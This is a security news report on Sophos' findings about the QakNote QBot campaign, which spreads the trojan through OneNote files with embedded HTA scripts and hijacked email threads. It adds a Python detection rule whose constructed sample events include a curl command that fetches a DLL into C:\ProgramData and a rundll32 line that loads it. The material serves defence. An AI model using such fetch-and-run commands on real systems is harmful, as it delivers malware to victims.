Security firm Sophos has discovered a new QBot campaign, dubbed QakNote, that uses Microsoft OneNote to infect systems with the banking trojan.
In its new report, Sophos says the campaign began on January 31, 2023 and uses OneNote notebooks containing an embedded HTML application (HTA file) that retrieves the malicious QBot payload. Cynet researcher Max Malyutin was the first to publicly report this shift in QBot distribution, on January 31, 2023.
The script in the HTA file uses the legitimate curl.exe utility to download the QBot DLL into the C:\ProgramData folder, and the DLL is then executed with rundll32.exe.
The QBot payload is injected into the Windows Assistive Technology Manager (AtBroker.exe) to hide its presence and evade antivirus detection.
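The chain described in the two paragraphs above (curl.exe dropping a DLL under C:\ProgramData, rundll32.exe loading that same DLL from the same parent process, and AtBroker.exe started by the loader) is something an EDR or SIEM rule can correlate rather than alert on piece by piece. The Python below is an added example, not Sophos' or Cynet's code. It assumes parsed process-creation events with pid, ppid, image and command-line fields (as a Sysmon Event ID 1 feed would give after parsing), treats mshta.exe as the Windows HTA host, and the sample events, file names and URL are constructed.

```python
"""Correlate the QakNote process chain over constructed process-creation events.

Added example for this article; field names, sample events, file names and the
URL are assumptions/constructed, not data from the Sophos or Cynet reports.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


# The article's drop location: anything directly under C:\ProgramData.
PROGRAMDATA = re.compile(r"^c:\\programdata\\", re.IGNORECASE)


def _name(path: str) -> str:
    """Lower-cased file name of an image path, e.g. 'curl.exe'."""
    return ntpath.basename(path).lower()


def curl_output_path(ev: ProcEvent) -> Optional[str]:
    """Return the -o/--output target of a curl.exe invocation (lower-cased), or None."""
    if _name(ev.image) != "curl.exe":
        return None
    m = re.search(r'(?:^|\s)(?:-o|--output)\s+"?([^"\s]+)', ev.cmdline, re.IGNORECASE)
    return m.group(1).lower() if m else None


def rundll32_dll_path(ev: ProcEvent) -> Optional[str]:
    """Return the DLL passed to rundll32.exe (first argument, before the export name)."""
    if _name(ev.image) != "rundll32.exe":
        return None
    parts = ev.cmdline.split(None, 1)
    if len(parts) < 2:
        return None
    return parts[1].split(",", 1)[0].strip('"').lower()


def detect_qaknote_chain(events):
    """Return one alert per rundll32.exe that loads a DLL which a sibling curl.exe
    (same parent process) wrote under C:\\ProgramData, noting an AtBroker.exe child."""
    by_pid = {e.pid: e for e in events}
    drops = {}  # (parent pid, dropped path) -> curl event
    for e in events:
        path = curl_output_path(e)
        if path and PROGRAMDATA.match(path):
            drops[(e.ppid, path)] = e

    alerts = []
    for e in events:
        dll = rundll32_dll_path(e)
        if not dll or not PROGRAMDATA.match(dll):
            continue
        curl_ev = drops.get((e.ppid, dll))
        if curl_ev is None:
            continue  # DLL from ProgramData but no matching curl drop: noisier, not this chain
        parent = by_pid.get(e.ppid)
        atbroker = [c for c in events if c.ppid == e.pid and _name(c.image) == "atbroker.exe"]
        alerts.append({
            "parent": _name(parent.image) if parent else None,  # expected: mshta.exe (HTA host)
            "curl_pid": curl_ev.pid,
            "rundll32_pid": e.pid,
            "dll": dll,
            "atbroker_pid": atbroker[0].pid if atbroker else None,
        })
    return alerts


# Constructed sample: OneNote -> mshta.exe -> curl.exe + rundll32.exe -> AtBroker.exe,
# plus two benign events that must not alert.
SAMPLE_EVENTS = [
    ProcEvent(300, 200, r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE", "ONENOTE.EXE"),
    ProcEvent(400, 300, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\alice\AppData\Local\Temp\Open.hta"),
    ProcEvent(410, 400, r"C:\Windows\System32\curl.exe",
              r"curl.exe https://example.invalid/img.png -o C:\ProgramData\update.dll"),
    ProcEvent(420, 400, r"C:\Windows\System32\rundll32.exe", r'rundll32.exe "C:\ProgramData\update.dll",Start'),
    ProcEvent(430, 420, r"C:\Windows\System32\AtBroker.exe", "AtBroker.exe"),
    ProcEvent(500, 100, r"C:\Windows\System32\curl.exe",
              r"curl.exe https://example.invalid/a.zip -o C:\Users\alice\Downloads\a.zip"),
    ProcEvent(510, 100, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for alert in detect_qaknote_chain(SAMPLE_EVENTS):
        print(alert)
```

Keying the correlation on the shared parent and on the identical DLL path keeps the rule quiet on ordinary curl downloads and on the many legitimate rundll32 invocations; the AtBroker child is recorded as extra confidence rather than required, since injection can also be observed by other telemetry.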
Sophos reports that QBot operators use two methods to distribute the HTA files: the first is sending emails with an embedded link to the malicious .one file, and the second is "thread hijacking".
Thread hijacking is a technique in which QBot operators take over existing email threads and send a "reply all" message to every participant of the thread, attaching the malicious OneNote file.
To make these attacks even more convincing, the attackers embed a fake button in the OneNote document that supposedly downloads the document from the cloud, but when clicked it launches the embedded HTA instead. Although the user is shown a warning about the risk of opening attachments after clicking the button, there is always a chance that the victim will ignore it.
Fake button in the file
As a defense against this new attack vector, Sophos advises email administrators to consider blocking all files with the .one extension, since they are not normally sent as attachments.